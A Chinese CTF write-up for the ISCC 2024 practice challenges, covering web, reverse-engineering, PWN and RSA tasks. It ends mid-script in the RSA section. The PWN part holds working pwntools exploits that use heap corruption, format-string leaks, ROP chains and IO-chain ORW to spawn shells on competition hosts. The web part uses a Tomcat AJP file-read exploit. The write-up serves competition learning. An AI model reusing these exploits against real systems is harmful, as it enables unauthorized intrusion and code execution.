admin管理员组文章数量:1579086
2024年ISCC练武题wp
- 前言:
- WEB:
- 还没想好名字的塔防游戏:
- 代码审计:
- 原神启动:
- Reverse:
- 迷失之门:
- Ai:
- CrypticConundrun:
- Badcode:
- WinterBegins:
- Find_All:
- I_am_the_Mathematician:
- DLLcode:
- PWN:
- chaos:
- easyshell:
- ISCC_U:
- Flag:
- Your_program:
- miao:
- eazy_heap:
- ISCC_easy:
- heapheap:
- Shopping:
- Misc:
- RSA_KU:
- 时间刺客:
- 工业互联网模拟仿真数据分析:
- 第一问:
- 第二问:
- 第三问:
- 第四问:
- 第五问:
- Number_is_the_key:
- Where_is_the_flag:
- FunZip:
- 钢铁侠在解密:
- 成语学习:
- 精装四合一:
- Mobile:
- Puzzle_Game:
前言:
关注鱼影安全,欢迎交流学习!
🛰:ly3260344435
🐧:3260344435
BiliBili:落寞的鱼丶
公众号:鱼影安全
CSDN:落寞的魚丶
知识星球:中职-高职-CTF竞赛
WEB:
还没想好名字的塔防游戏:
F12
查看源代码word.js
找到3
段提升标题+js
大写字母即可。
ISCC{MDWTSGTMMSSSPFRMMM}
代码审计:
听说你的代码能力很强,flag在flag.txt里面哦
发现geneSign
的路由,这个用来获取签名
http://101.200.138.180:12315/geneSign?param=flag.txtread
GET /De1ta?param=flag.txt HTTP/1.1
Host: 101.200.138.180:12315
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=1
Cookie: action=readscan;sign=c451a16ad8a948bf46e81eae0fa93834
ISCC{jYkFpFWcWOJ86AYd}
原神启动:
你能打败强大的怪物,获得宝藏吗?
使用工具扫描 发现漏洞,网上找个exp:漏洞利用
nuclei -u http://101.200.138.180:8080/ -me zgx
python2 CNVD-2020-10487-Tomcat-Ajp-lfi\ \1.py 101.200.138.180 -p 8009 -f WEB-INF/flag.txt
ISCC{OxxcjzK0ROr7s_uI}
Reverse:
迷失之门:
该用哪吧钥匙开门呢?
无壳64
位程序,使用IDA
打开
发现使用check
函数检查输入的flag
是否正确
check
函数中是一段加密,又嵌套了一个check_2
函数
check_2
对加密后的字符串进行逐个对比,由此可以提取出密文,解得flag
encrypted_values = [] #密文
enc = [chr(i) for i in encrypted_values]
def decrypt(s):
char_sets = {
"upper": "ABCDEFGHIJKLMNOPQRSTUVWXYZ",
"lower": "abcdefghijklmnopqrstuvwxyz",
"special": "0123456789+/-=!#&*()?;:*^%",
"key": "DABBZXQESVFRWNGTHYJUMKIOLPC"
}
decoded = []
for i, char in enumerate(s):
if char in char_sets["upper"]:
offset = char_sets["upper"].find(char)
decoded_char = chr(ord(char_sets["key"][i]) + offset)
elif char in char_sets["lower"]:
offset = char_sets["lower"].find(char)
decoded_char = chr(ord(char_sets["key"][i]) + offset + 26)
elif char in char_sets["special"]:
offset = char_sets["special"].find(char)
decoded_char = chr(ord(char_sets["key"][i]) + offset + 52)
else:
decoded_char = char
decoded.append(decoded_char)
return ''.join(decoded)
decrypted_text = decrypt(enc)
print(decrypted_text)
ISCC{bXdW^dVko[crn~auuduky}
Ai:
给的pyc
文件放到pyc
反编译在线网站上,得到源代码chatgpt
写个解密脚本得到密码
import base64
def decrypt_and_compare(encrypted_base64, offset_str):
encrypted_bytes = base64.b64decode(encrypted_base64).decode('utf-8')
decrypted_chars = []
for i, char in enumerate(encrypted_bytes):
offset = int(offset_str[i])
encrypted_val = ord(char)
if i % 2 == 0:
new_ascii = (encrypted_val ^ offset) - offset
else:
new_ascii = (encrypted_val ^ offset) + offset
decrypted_char = chr(new_ascii)
decrypted_chars.append(decrypted_char)
decrypted_str = ''.join(decrypted_chars)
return decrypted_str
_187z = 'AI-18.7z'
offset_str = '123456789012345678901234'
target_base64 = 'TWF/c1sse19GMW5gYVRoWWFrZ3lhd0B9'
decrypted_str = decrypt_and_compare(target_base64, offset_str)
print(decrypted_str)
#Key{Y0u_F1nd_The_key_w@}
import torch
import torch.nn as nn
import torchvision.transforms as transforms
from PIL import Image
import os
# 定义神经网络模型
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.fc1 = nn.Linear(28 * 28, 128)
self.fc2 = nn.Linear(128, 64)
self.fc3 = nn.Linear(64, 10)
def forward(self, x):
x = x.view(-1, 28 * 28)
x = torch.relu(self.fc1(x))
x = torch.relu(self.fc2(x))
x = self.fc3(x)
return x
# 加载模型
def load_model(model_path):
model = torch.load(model_path)
model.eval()
return model
# 对图像进行预处理和数字预测
def preprocess_and_predict(model, image_path):
transform = transforms.Compose([
transforms.Grayscale(num_output_channels=1),
transforms.Resize((28, 28)),
transforms.ToTensor(),
transforms.Normalize((0.5,), (0.5,))
])
image = Image.open(image_path)
image = transform(image)
image = image.unsqueeze(0)
with torch.no_grad():
outputs = model(image)
_, predicted = torch.max(outputs, 1)
return predicted.item()
# 获取图像文件夹中的所有图像文件,并预测数字
def predict_digits_in_folder(model, image_folder):
results = []
for i in range(1, 25):
image_path = os.path.join(image_folder, f"{i}.png")
predicted_digit = preprocess_and_predict(model, image_path)
results.append(predicted_digit)
return results
# 根据数字替换为特定字符
def replace_with_table(results, table):
return "".join([table[str(i)] for i in results])
# 主函数
def main():
model_path = "confused_digit_recognition_model.pt"
image_folder = "./"
# 加载模型
model = load_model(model_path)
# 预测数字
results = predict_digits_in_folder(model, image_folder)
# 字符替换
table = {"0": "@nd", "1": "a!", "2": "_", "3": "F", "4": "SSS", "5": "W@", "6": "K", "7": "1", "8": "C", "9": "d"}
replaced_results = replace_with_table(results, table)
# 输出结果
print("Predicted digits:", "".join([str(i) for i in results]))
print("Replaced characters:", replaced_results)
if __name__ == "__main__":
main()
# Created By Evi1s7
##C11C@ndKCK_FF_KCSSS_W@FdW@a!_SSSd
CrypticConundrun:
Do not get lost!
检测到UPX
,用UPX
脱壳
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2023
UPX 4.0.2 Markus Oberhumer, Laszlo Molnar & John Reiser Jan 30th 2023
File size Ratio Format Name
-------------------- ------ ----------- -----------
61558 <- 46710 75.88% win64/pe Cryptic.exe
Unpacked 1 file.
可以看到经过了两次加密,一次是mix
,一次是Encryption
,根据逻辑写出解密操作
def decryption(enc, key):
a3 = len(enc)
key_int = [ord(c) for c in key]
for n in range(a3):
enc[n] -= 10
for m in range(a3 - 1):
enc[m] += enc[m + 1]
for k in range(a3 - 1):
enc[k] ^= key_int[2]
for j in range(0, a3, 2):
enc[j] ^= key_int[j % 4]
for j in range(a3 // 2):
enc[j], enc[a3 - j - 1] = enc[a3 - j - 1], enc[j]
for i in range(a3 // 2):
enc[i], enc[a3 - i - 1] = enc[a3 - i - 1], enc[i]
for i in range(a3):
enc[i] += key_int[i % 4]
def main():
key = "ISCC"
enc = [0x34, 0xEA, 0x6D, 0xA7, 0xB0, 0x9C, 0x30, 0xE4, 0x7B, 0xC8,
0xEB, 0x2C, 0x8F, 0x8A, 0x40, 0xB5, 0xA0, 0xAE, 0xC3, 0x50,
0x07, 0xEE, 0xE5, 0x62, 0xF4, 0x34]
decryption(enc, key)
print("".join(chr(i % 256) for i in enc))
if __name__ == "__main__":
main()
ISCC{NCKn/F'XH$EyqBC4OvDg}
Badcode:
好学的小明又开始学习c++了,他猛猛写了一堆代码,并且很高兴实现了功能,但是我们发现,他的代码写的真的很差,这次他又将自己的秘密藏在里面,你能揭穿他的秘密吗?
32
位无壳,调试发现关键加密函数
查找资料对比发现 XXTEA
加密,根据main
整体逻辑写出解密脚本
#include <stdio.h>
#include <stdint.h>
#define DELTA 0x9e3779b9
#define MX (((z>>5^y<<2) + (y>>3^z<<4)) ^ ((sum^y) + (key[(p&3)^e] ^ z)))
#include <iostream>
using namespace std;
void btea(uint32_t *v, int n, uint32_t const key[4]) {
uint32_t y, z, sum;
unsigned p, rounds, e;
n = -n;
rounds = 6 + 52 / n;
sum = rounds * DELTA;
y = v[0];
do {
e = (sum >> 2) & 3;
for (p = n - 1; p > 0; p--) {
z = v[p - 1];
y = v[p] -= MX;
}
z = v[n - 1];
y = v[0] -= MX;
sum -= DELTA;
} while (--rounds);
}
int main() {
uint32_t key[4] = {0x12345678, 0x9ABCDEF0, 0xFEDCBA98, 0x76543210};
uint32_t v[] = {0xE9E4F557,
0xD4988D1A,
0x9DC89258,
0xD50B9B4C,
0x3601727B,
0x91FEF8D1
};
btea(v, -6, key);
string xxtea = (char *)v;
int v16[24];
srand(0x18);
for (int i = 0; i < 24; ++i ) {
v16[i] = rand() % 10 + 48;
}
for (int k = 0; k < 24; ++k ) {
xxtea[k] ^= (v16[k] - 48);
}
for (int j = 0; j < 24; ++j ) {
if ( j % 2 ) {
xxtea[j] -= 2;
} else {
xxtea[j] += 3;
}
}
for (int i = 0; i < 24; i++) {
cout << (char)xxtea[i];
}
}
ISCC{ePm87e9saHb9C51MWv}
WinterBegins:
My frozen pen, reluctant to write a new poem,
Warms old wine beside the cold stove from time to time.
Drunk, I gaze at the ink blots in the moonlight,
And fancy a village, deeply covered in snow.
主程序逻辑如上,跟踪flag
输入发现主要加密函数,是个类似索引取密码表替换明文的操作
这是主要加密部分,提取出密文和表,根据程序逻辑解密即可
这里sub_140001490
的作用就是字符串反转,所以提取出来的密文是逆序的,要反转
def decode(enc, table):
idx_list = [table.find(enc[i:i+2]) // 2 for i in range(0, len(enc), 2)]
char_list = []
for i in range(len(idx_list)):
if idx_list[i] == 11:
char_list.append(chr(61 + idx_list[i+1]))
i += 1
else:
char_list.append(chr(idx_list[i] + ord('0')))
return ''.join(char_list)
table="冻笔新诗懒写寒炉美酒时温醉看墨花月白恍疑雪满前村"
enc="美酒恍疑时温寒炉美酒寒炉寒炉懒写墨花前村时温时温前村恍疑醉看前村墨花墨花前村美酒墨花墨花醉看月白墨花时温墨花墨花醉看懒写墨花月白时温前村恍疑墨花前村美酒醉看寒炉寒炉懒写醉看前村时温墨花美酒醉看醉看墨花月白时温前村恍疑寒炉懒写墨花前村墨花"
print(decode(enc, table))
#495343327B5F6D7A7768757762785F7A63326B7466785F327D0
根据程序逻辑把2
替换成前一个字符即可 ISCC{mzwhuwbx_zccktfx_}
ISCC{_mzwhuwbx_zccktfx__}
Find_All:
当你走出这片森林,未来的光明将是你的收获,路途的脚印亦是你的宝藏
题目是一个迷宫逆向
● v4, v5: 用于存储sub_401050函数调用的参数。
● v6, v7: 用于存储玩家在迷宫中的当前位置坐标。
● v8, v9: 用于存储玩家输入后的新位置坐标。
● v10: 一个字符数组,用于存储用户输入的flag。
● v11: 一个更大的字符数组,用于存储迷宫的布局。
● v12: 一个整数,用作程序的返回值。
程序首先使用qmemcpy
函数将一个特定的字符串复制到v11
数组中,这个字符串代表了迷宫的布局,然后有个调试器检查,绕过它就行。如果没有检测到调试器,程序将初始化迷宫,设置玩家的起始位置,并进入一个循环,允许用户通过按键('a', 'd', 's', 'w')
来控制玩家在迷宫中的移动。用户的移动受到限制,只能在迷宫的边界内移动,并且不能移动到非空格('48')
的位置。当用户移动到迷宫中标记为'75'(ASCII码为'K')
的位置时,循环结束。
可以直接找到flag存储密文的地方
提取出密文解密即可
def transform(v):
for i in range(0, len(v) - 1, 4):
v4[i + 2] ^= v4[i+3]
v4[i + 1] ^= v4[i + 2]
v4[i] ^= v4[i + 1]
return v
v4 = [get_wide_byte(0x00401625 + i * 7) for i in range(24)]
print(bytes(transform(v4)).decode())
ISCC{DCf129Dc@Ac@cdvg@!}
I_am_the_Mathematician:
The mathematician has a codebook.
Who is the mathematician and where is the true code?
发现了一个关键字,题目似乎跟斐波那契数列的算法有关,程序主体操作是一个简单的逐个字符进行累计,写出脚本对txt
密文进行解密即可
def fib(n):
a, b = 0, 1
lis = []
for _ in range(n):
lis.append(a)
a, b = b, a + b
return lis
with open("./code_book_21.txt", "r") as file:
data = file.read()
target = fib(20)
assert target[-1] > len(data) # 确保文件内容长度小于第20个斐波那契数
print(f"ISCC{{{''.join(data[i - 1] if i < len(data) else '' for i in target)}}}")
ISCC{77niT9odtSBrrXctcs}
DLLcode:
把鸡蛋放在同一个篮子里是一个错误的决定
发现调用DLL
进行加密,下面是密文分析DLL
Block = [73, 83, 67, 67]
v4 = [2, 0, 3, 1, 6, 4, 7, 5, 10, 8, 11, 9]
enc = [] #密文
enc_back = enc[:12]
enc_front = enc[12:]
flag = [0] * 24
for i in range(12):
flag[2 * i + 1] = enc_front[v4[i]]
for i in range(12):
enc_back[i] ^= Block[i & 3]
for i in range(12):
flag[2 * i] = enc_back[i]
print(''.join(chr(x) for x in flag))
ISCC{YWYXSZPdSbJRuStWb@}
PWN:
chaos:
It is not chaos!
chaos
函数,如果*ptr==Flag
,就可以提权
ptr
固定大小为0x70,v2
的大小可以任意跳转,可以先申请一个0x20
大小的堆然后释放进bin
中,这样在chaos
函数的时候,v2
的堆块在ptr
上面,这个时候溢出到下面即可
from pwn import *
from ctypes import*
p=remote('182.92.237.102',10010)
def create(Size,Content=b'a'):
p.recvuntil(b'Choice')
p.sendline(b'1')
p.recvuntil(b'Size')
p.sendline(bytes(str(Size),'utf-8'))
p.recvuntil(b'Chaos')
p.sendline(Content)
def free(id):
p.recvuntil(b'Choice')
p.sendline(b'2')
p.recvuntil(b'index')
p.sendline(bytes(str(id),'utf-8'))
def backdoor(Size,Content):
p.recvuntil(b'Choice')
p.sendline(b'5')
p.recvuntil(b'size')
p.sendline(bytes(str(Size),'utf-8'))
p.recvuntil(b'Content')
p.send(Content)
create(0x18)
free(0)
backdoor(0x18,b'\x00'*0x20+b'Flag\x00\n')
p.interactive()
easyshell:
一个可以帮你验证flag的shell
func
函数,有一个溢出和fmt
漏洞,
还给了后门函数,先利用fmt
泄露出canary
和elf
地址,之后ret2text
from pwn import *
from ctypes import*
p=remote('182.92.237.102',10011)
payload=b'flagis\x00'+b'%17$p--%15$p'
p.recvuntil(b'>>')
p.sendline(payload)
p.recvuntil(b'0x')
elf_add=int(p.recv(6*2),16)
elfbase=elf_add-0x1520
success('elfbase '+hex(elfbase))
p.recvuntil(b'0x')
canary=int(p.recv(8*2),16)
success('canary '+hex(canary))
backdoor=elfbase+0x1291
payload=b'exit'.ljust(56,b'\x00')+p64(canary)+p64(0)+p64(backdoor)
p.recvuntil(b'>>')
p.sendline(payload)
p.interactive()
ISCC_U:
Canary下的简单堆栈
main
函数,一个堆题
在add
函数中,堆包含堆的关系,在第一个堆上放了函数指针,然后引用输出完成打印
del
函数,中有uaf
利用uaf
漏洞对原来地址上的函数指针覆盖为system
就行
from pwn import *
io = remote('182.92.237.102', 10016)
libc = ELF('../libc/libc6-i386_2.31-0ubuntu9.14_amd64.so')
def allocate(Size, Content=b'a'):
io.recvuntil(b'choice')
io.sendline(b'1')
io.recvuntil(b'size')
io.sendline(bytes(str(Size), 'utf-8'))
io.recvuntil(b'Content')
io.send(Content)
def deallocate(id):
io.recvuntil(b'choice')
io.sendline(b'2')
io.recvuntil(b'Index')
io.sendline(bytes(str(id), 'utf-8'))
def show(id):
io.recvuntil(b'choice')
io.sendline(b'3')
io.recvuntil(b'Index')
io.sendline(bytes(str(id), 'utf-8'))
context.arch = 'i386'
allocate(0x500) # 0
allocate(0x20) # 1
deallocate(0)
allocate(0x500, b'a' * 4) # 2
show(0)
libc_address = u32(io.recvuntil(b'\xf7')[-4:])
malloc_hook = libc_address - 56 - 0x18
libc_base = malloc_hook - libc.symbols['__malloc_hook']
system_addr = libc_base + libc.symbols['system'] + 1
puts_addr = libc_base + libc.symbols['puts']
success('malloc_hook ' + hex(malloc_hook))
success('libc_base ' + hex(libc_base))
deallocate(1)
deallocate(2)
allocate(0x8, p32(system_addr) + b';sh;')
show(1)
io.interactive()
ISCC{9a7c5fbc-9d62-4edc-998a-62e8152f4df3}
Flag:
一个简单的c语言编译器
main
函数,在welcome
函数中,字符串格式化漏洞
在back
中有栈溢出
利用fmt
泄露出canary
,因为没给libc
,利用溢出ret2libc
,这里使用libcsearch
from pwn import *
from LibcSearcher import *
io = remote('182.92.237.102', 10012)
# io = process('../pwn')
elf = ELF('../pwn')
context.arch = 'i386'
payload = b'a%19$p'
io.sendline(payload)
io.recvuntil(b'0x')
canary = int(io.recv(4*2), 16)
success('canary ' + hex(canary))
leak = 'read'
leak_got = elf.got[leak]
puts_plt = elf.plt['puts']
call_back = 0x80494E0
payload = b'a' * (136) + p32(canary) + p32(0xdead) + b'a' * (8)
payload += p32(puts_plt) + p32(call_back) + p32(leak_got)
io.recvuntil(b'Input')
io.sendline(payload)
leak_add = u32(io.recvuntil(b'\xf7')[-4:])
libc = LibcSearcher(leak, leak_add)
libcbase = leak_add - libc.dump(leak)
system = libcbase + libc.dump('system')
str_bin_sh = libcbase + libc.dump('str_bin_sh')
log.info('libcbase ' + hex(libcbase))
payload = b'a' * (136) + p32(canary) + p32(0xdead) + b'a' * (8)
payload += p32(system) + p32(call_back) + p32(str_bin_sh)
io.recvuntil(b'Input')
io.sendline(payload)
io.interactive()
Your_program:
打开main
函数,init
之后调用了这个函数
发现直接无限溢出并且程序没有开任何保护直接打
from pwn import *
io = process('./pwn')
elf_object = ELF('./pwn')
context(arch='amd64', os='linux')
#gdb.attach(io, 'b *0x00000000004012DA')
rdi_ret = 0x0000000000401763
leave_addr = 0x00000000004012DA
o_address = 0x0000000000403668
leak_function = 0x0000000004013D3
io.recvuntil('y: ')
payload = b'A'*0x20 + p64(elf_object.bss() + 0x200)
payload += p64(rdi_ret) + p64(o_address - 0x28) + p64(elf_object.plt['gets'])
payload += p64(leak_function) + p64(rdi_ret) + p64(elf_object.bss() + 0x200) + p64(elf_object.plt['gets']) + p64(leave_addr)
io.sendline(payload)
io.recvuntil('ul!\n')
io.sendline(p64(leave_addr + 1) * 5 + p64(o_address - 0x28))
io.sendline('%p')
stack_addr = int(io.recvline()[:-1], 16)
payload2 = p64(0) + p64(rdi_ret) + p64(stack_addr) + p64(elf_object.plt['gets']) + p64(stack_addr)
io.sendline(payload2)
io.sendline(asm(shellcraft.sh()))
io.interactive()
ISCC{fb521a80-eba3-403f-a16c-5e80d2ac267d}
miao:
这里有一只可爱的小猫
静态编译需要自己修复函数,开了canar
,这里fmt
先泄露canary
然后miaomiao
中直接溢出,静态连接的程序,直接生成ropchain
from pwn import *
p=remote('182.92.237.102',10015)
# p=process('./pwn')
p.sendline(b'%31$p')
p.recvuntil(b'0x')
canary=int(p.recv(4*2),16)
log.info('canary '+hex(canary))
context.arch='i386'
str_bin_sh=0x80BB7C8
int_x80=0x0806cf83
eax_ret=0x080b8666
ecx_ret=0x080def3d
edx_ret=0x0806f30a
ebx_edx_ret=0x0806f309
ropchain=b''
ropchain+=p32(eax_ret)+p32(11)
ropchain+=p32(ebx_edx_ret)+p32(str_bin_sh)+p32(0)+p32(ecx_ret)+p32(0)
ropchain+=p32(int_x80)
payload=b'\x00'*(0x70-0xc)+p32(canary)+b'\x00'*(0xc-0x4)+p32(0)+ropchain
p.sendline(payload)
p.interactive()
eazy_heap:
一个简单的堆程序
在init
开了沙盒,菜单选择
edit
函数off_by_null
,add
函数限制了大小
高版本off_by_null
+直接io
链的orw
安排上
from pwn import *
from ctypes import *
from ctypes import *
from struct import pack
conn = remote('182.92.237.102', 2122)
FILENAME = '../pwn4'
libc = ELF('../libc.so.6')
context.arch = 'amd64'
def create_block(size, content=b'a'):
conn.recvuntil(b'choice')
conn.sendline(b'1')
conn.recvuntil(b'size')
conn.sendline(bytes(str(size), 'utf-8'))
conn.recvuntil(b'content')
conn.send(content)
def free_block(idx):
conn.recvuntil(b'choice')
conn.sendline(b'2')
conn.recvuntil(b'idx')
conn.sendline(bytes(str(idx), 'utf-8'))
def edit_block(idx, content):
conn.recvuntil(b'choice')
conn.sendline(b'4')
conn.recvuntil(b'idx')
conn.sendline(bytes(str(idx), 'utf-8'))
conn.recvuntil(b'content')
conn.send(content)
def show_block(idx):
conn.recvuntil(b'choice')
conn.sendline(b'3')
conn.recvuntil(b'idx')
conn.sendline(bytes(str(idx), 'utf-8'))
create_block(0x410)
create_block(0x100)
create_block(0x430)
create_block(0x430)
create_block(0x100)
create_block(0x480)
create_block(0x420)
create_block(0x100)
free_block(0)
free_block(3)
free_block(6)
free_block(2)
payload = b'\x00' * (0x430) + p64(0) + p32(0x440 + 0x110 + 0x1)
create_block(0x430 + 0x20, payload)
create_block(0x410)
create_block(0x410)
create_block(0x420)
free_block(3)
free_block(2)
create_block(0x410, b'\x00' * 9) # 2 A
free_block(6)
free_block(5)
payload = b'\x00' * (0x480) + p64(0) + p64(0x431) + b'\x00'
create_block(0x500 - 0x8, payload)
create_block(0x3c0 - 0x8)
create_block(0x410)
free_block(4)
payload = b'\x00' * 0x100 + p64(0x550)
create_block(0x108)
edit_block(4, payload)
free_block(3)
create_block(0x430)
create_block(0x400)
show_block(3)
libc_add = u64(conn.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
libcbase = libc_add - 0x21a200
log.info('libcbase ' + hex(libcbase))
conn.recvuntil(b'\x7f')
heap_add = u64(conn.recv(8)) >> (8 * 2)
heapbase = heap_add - 0xc00
key = (heapbase >> 12) + 1
success('heapbase ' + hex(heapbase))
success('key ' + hex(key))
IO_2_1_stdout = libcbase + 0x21a780
create_block(0x400) # 9
free_block(9)
free_block(8)
edit_block(4, p64(key ^ IO_2_1_stdout))
IO_wfile_jumps = libcbase + 0x2160c0
success('IO_wfile_jumps ' + hex(IO_wfile_jumps))
setcontextadd = libcbase + libc.sym['setcontext']
ret = libcbase + 0x0000000000029cd6
# fake_IO
fakeIO_add = IO_2_1_stdout
orw_add = heapbase + 0x1050
A = fakeIO_add + 0x40
B = fakeIO_add + 0xe8 + 0x40 - 0x68
C = fakeIO_add
fake_IO = p64(0) # flag rdi
fake_IO = fake_IO.ljust(0x28, b'\x00')
fake_IO += p64(1) # _IO_write_ptr>_IO_write_base
fake_IO = fake_IO.ljust(0x88, b'\x00')
fake_IO += p64(fakeIO_add) # lock
fake_IO = fake_IO.ljust(0xa0, b'\x00')
fake_IO += p64(A) # _wide_data=rdx
fake_IO = fake_IO.ljust(0xd8, b'\x00')
fake_IO += p64(IO_wfile_jumps)
fake_IO += p64(orw_add) + p64(ret) + b'\x00' * 0x30
fake_IO += p64(B) + p64(setcontextadd + 61)
print(hex(len(fake_IO)))
mprotect = libcbase + libc.sym['mprotect']
rdi_ret = libcbase + 0x000000000002a3e5
rsi_ret = libcbase + 0x000000000002be51
rdx_r12_ret = libcbase + 0x000000000011f497
orw = p64(rdi_ret) + p64(heapbase - (heapbase & 0xfff)) + p64(rsi_ret) + p64(0x5000)
orw += p64(rdx_r12_ret) + p64(7) * 2 + p64(mprotect) + p64(orw_add + 0x48)
orw += asm(shellcraft.cat('flag')) + b'\x90' * 4
print(hex(len(orw)))
create_block(0x400, orw)
create_block(0x400, fake_IO)
conn.recvuntil(b'choice')
conn.sendline(b'5')
conn.interactive()
ISCC_easy:
Welcome to ISCC!
字符串格式化漏洞,直接溢出
利用字符串格式化漏洞泄露地址然后改num
然后溢出覆盖就行了
from pwn import *
io = process('./pwn')
libc = ELF('./libc6-i386_2.31-0ubuntu9.14_amd64.so')
context.arch = 'i386'
num = 0x804C030
payload = fmtstr_payload(4, {num: 5}) + b'%15$p'
io.send(payload)
io.recvuntil(b'0x')
libc_add = int(io.recv(8), 16)
libcbase = libc_add - libc.sym['__libc_start_main'] - 245
success('libcbase ' + hex(libcbase))
system = libcbase + libc.symbols['system']
sh = libcbase + next(libc.search(b'/bin/sh'))
payload = b'a' * (0x90 + 0x4) + p32(system) * 2 + p32(sh)
io.recvuntil(b'Input')
io.sendline(payload)
io.interactive()
heapheap:
Largebin是一把功能十分强悍,它和Prtcl孰强孰弱呢?
开了沙盒的堆题,沙盒禁用了execve
uaf
漏洞,但是只能申请到大chunk
使用largbin attack
打io
链然后orw
from pwn import *
io = remote('182.92.237.102', 11000)
libc = ELF('../libc-2.31.so')
def add(index, size):
io.recvuntil(b'choice')
io.sendline(b'1')
io.recvuntil(b'index')
io.sendline(bytes(str(index), 'utf-8'))
io.recvuntil(b'Size')
io.sendline(bytes(str(size), 'utf-8'))
def free(index):
io.recvuntil(b'choice')
io.sendline(b'4')
io.recvuntil(b'index')
io.sendline(bytes(str(index), 'utf-8'))
def edit(index, content):
io.recvuntil(b'choice')
io.sendline(b'3')
io.recvuntil(b'index')
io.sendline(bytes(str(index), 'utf-8'))
io.recvuntil(b'context')
io.send(content)
def show(index):
io.recvuntil(b'choice')
io.sendline(b'2')
io.recvuntil(b'index')
io.sendline(bytes(str(index), 'utf-8'))
add(0, 0x420)
add(1, 0x410)
add(2, 0x410)
add(3, 0x410)
free(0)
show(0)
libc_address = u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
libc_base = libc_address - libc.symbols['__malloc_hook'] - 96 - 0x10
io_list_all = libc_base + 0x1ed5a0
log.info('libc_base ' + hex(libc_base))
log.info('io_list_all ' + hex(io_list_all))
add(4, 0x430)
edit(0, b'a'*(0x10-1)+b'A')
show(0)
io.recvuntil(b'A')
heap_address = u64(io.recvuntil(b'\n')[:-1].ljust(8, b'\x00'))
log.info('heap_address ' + hex(heap_address))
fd = libc_base + 0x1ecfd0
payload = p64(fd)*2 + p64(heap_address) + p64(io_list_all - 0x20)
edit(0, payload)
free(2)
add(5, 0x470)
free(5)
open_address = libc_base + libc.sym['open']
read_address = libc_base + libc.sym['read']
write_address = libc_base + libc.sym['write']
setcontext_address = libc_base + libc.sym['setcontext']
rdi = libc_base + 0x0000000000023b6a
rsi = libc_base + 0x000000000002601f
rdx_r12 = libc_base + 0x0000000000119431
ret = libc_base + 0x0000000000022679
# fake_IO
chunk_small = heap_address + 0x850
IO_wfile_jumps = libc_base + 0x1e8f60
fake_IO_address = chunk_small
orw_address = fake_IO_address + 0x200
A = fake_IO_address + 0x40
B = fake_IO_address + 0xe8 + 0x40 - 0x68
C = fake_IO_address
fake_IO = b''
fake_IO = fake_IO.ljust(0x18, b'\x00')
fake_IO += p64(1) # _IO_write_ptr>_IO_write_base
fake_IO = fake_IO.ljust(0x78, b'\x00')
fake_IO += p64(fake_IO_address) # lock
fake_IO = fake_IO.ljust(0x90, b'\x00')
fake_IO += p64(A) # _wide_data=rdx
fake_IO = fake_IO.ljust(0xc8, b'\x00')
fake_IO += p64(IO_wfile_jumps)
fake_IO += p64(orw_address) + p64(ret) + b'\x00'*0x30
fake_IO += p64(B) + p64(setcontext_address + 61)
flag_address = orw_address + 0x100 + 0x10
orw = p64(rdi) + p64(flag_address) + p64(rsi) + p64(0) + p64(open_address)
orw += p64(rdi) + p64(3) + p64(rsi) + p64(flag_address) + p64(rdx_r12) + p64(0x50) + p64(0) + p64(read_address)
orw += p64(rdi) + p64(1) + p64(write_address)
payload = fake_IO
payload = payload.ljust(0x200-0x10, b'\x00')
payload += orw
payload = payload.ljust(0x300, b'\x00')
payload += b'flag\x00'
edit(2, payload)
io.recvuntil(b'choice')
io.sendline(b'5')
io.interactive()
Shopping:
main
函数中有字符串验证,然后启动线程的函数,主要就是申请chunk
然后输入
调用mycall
指针函数来实现打印
在myread
中有逻辑漏洞会造成输入chunk
的时候溢出
thread_arena
来管理堆块,当申请到4
页大小空间会和thread_arena
相邻
这个时候溢出覆盖thread_arena
控制指针完成提权
from pwn import *
io = remote('182.92.237.102', 10019)
def create_entry(size, content=b'a', count=0, mode=1):
io.recvuntil(b'Action')
io.sendline(b'1')
io.recvuntil(b'ID')
io.sendline(bytes(str(size), 'utf-8'))
io.recvuntil(b'Quantity')
io.sendline(bytes(str(count), 'utf-8'))
io.recvuntil(b'Add')
io.sendline(bytes(str(mode), 'utf-8'))
if content == b'no':
return
io.recvuntil(b'Message')
padded_content = content.ljust(size, b'\x00')
io.send(padded_content)
io.sendline(b"I'm ready for shopping")
io.recvuntil(b'***', timeout=5)
for i in range(12):
create_entry(0x4000, b'no', 1000, 0)
create_entry(0x4000, b'a', 261)
sleep(1)
create_entry(0x3000)
create_entry(0x1000 - 0x8, b'no')
io.send(b'a' * (0x1000 - 0x8 - 0x10))
sleep(1)
CALLW = 0x602038
system_address = 0x000000000400978
bss_address = 0x602040
payload = b'\x00' * (0x8 + 0x20 + 0x20) + p64(0) + p64(CALLW - 0x1b) * 6 + p64(bss_address) # remote
io.send(payload)
create_entry(0x60, b'\x00' * (0x1b - 0x10) + p64(system_address) + p64(0) + p64(0x8f))
create_entry(0x70, b'/bin/sh\x00')
io.interactive()
Misc:
RSA_KU:
一道简单的RSA
# -*- coding: utf-8
import gmpy2
from Crypto.Util.number import *
n = 129699330328568350681562198986490514508637584957167129897472522138320202321246467459276731970410463464391857177528123417751603910462751346700627325019668100946205876629688057506460903842119543114630198205843883677412125928979399310306206497958051030594098963939139480261500434508726394139839879752553022623977
e = 65537
c = 44966298375376688006146988322206393966214090881593395122244343443082290567508149057626773859464186519313116450319974063750688272400363080277647563949932916419619671548411693220994757715211785341917382400721102749647554428046099483334760987169167676276309344232592258014942773447115037760819673733353283537
n1= 129699330328568350681562198986490514508637584957167129897472522138320202321246467459276731970410463464391857177528123417751603910462751346700627325019668067056973833292274532016607871906443481233958300928276492550916101187841666991944275728863657788124666879987399045804435273107746626297122522298113586003834
n2 = 129699330328568350681562198986490514508637584957167129897472522138320202321246467459276731970410463464391857177528123417751603910462751346700627325019668066482326285878341068180156082719320570801770055174426452966817548862938770659420487687194933539128855877517847711670959794869291907075654200433400668220458
ppq=(n-n1+n-n2+4)//3 #p+q
